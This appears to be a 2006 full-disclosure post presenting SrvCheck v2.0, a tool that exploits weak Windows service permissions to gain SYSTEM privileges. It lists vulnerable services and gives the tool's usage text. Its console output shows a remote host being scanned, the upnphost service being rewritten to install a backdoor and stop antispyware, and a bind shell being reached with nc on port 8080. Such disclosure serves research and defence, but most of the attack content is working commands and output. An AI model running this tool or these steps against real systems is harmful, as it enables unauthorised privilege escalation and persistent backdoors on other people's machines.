SecurityvulnsSECURITYVULNS:DOC:11395[Full-disclosure] Privilege Scalation for Windows Networks using weak Service restrictions v2.0 exploit
Proof of concept of Sudhakar Govindavajhala and Andrew Appel paper (http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf) Running as an unprivileged user you can test if your services are vulnerable and can be used to install a backdoor. Both source code and binary included
Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx
SrvCheck v2.0 is able to perform this checks remotely using for example domain user credentials
Here is a short list of Known vulnerable services under XP sp2:
- Advanced User:
service: DcomLaunch ( SYSTEM )
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service) - User:
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service) - Network Config Operators:
service: DcomLaunch ( SYSTEM )
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service)
Service: DHCP ( SYSTEM )
Service: NetBT (SYSTEM - .sys driver)
Service DnsCache (SYSTEM)
Windows 2000 Professional SP4:
- Power User:
service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM )
Third part Software:
HP: "Pml Driver HPZ12"
Audodesk: "Autodesk Licensing Service" - maybe this one: http://securityfocus.com/bid/16472
D:\Programacion\srvcheck2>srvcheck2.exe -?
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]
Usage:
-l list vulnerable services
-m <service> modify the configuration for that service
-c <command> Command to execute throw remote service
by default. bindshell application will be used
-H <Host> specify a remote host to connect ip/netbiosname)
-u <user> if not seletected Default logon credentials used)
-p <password> if not used Default logon credentials used)
-? Extended information with samples
examples:
srvcheck.exe -l (list local vulnerabilities)
srvcheck.exe -m service (spawn a shell at port 8080)
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"
srvcheck -l -H host (list remote vulnerabilities)
D:\Programacion\srvcheck2>srvcheck2.exe -l -H 192.168.0.1
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]
[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Listing Vulnerable Services…
[Dhcp] Cliente DHCP
Status: 0x4
Parameter: C:\WINDOWS\System32\svchost.exe -k netsvcs
[Dnscache] Cliente DNS
Status: 0x4
Parameter: C:\WINDOWS\System32\svchost.exe -k NetworkService
[NetBT] NetBios a travUs de Tcpip
Status: 0x4
Parameter: System32\DRIVERS\netbt.sys
[SSDPSRV] Servicio de descubrimientos SSDP
Status: 0x1
Parameter: C:\WINDOWS\System32\svchost.exe -k LocalService
[upnphost] Host de dispositivo Plug and Play universal
Status: 0x1
Parameter: C:\WINDOWS\System32\svchost.exe
[+] Analyzed 311 Services in your system
[+] You were Lucky. 5 vulnerable services found
D:\Programacion\srvcheck2>srvcheck2.exe -H 192.168.0.1 -m upnphost
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - [email protected]
[+] Trying to connect to remote SCM
[+] Host: \\192.168.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution…
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code…
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start… (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges
D:\Programacion\srvcheck2>nc localhost 8080
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
regards,
Andres Tarasco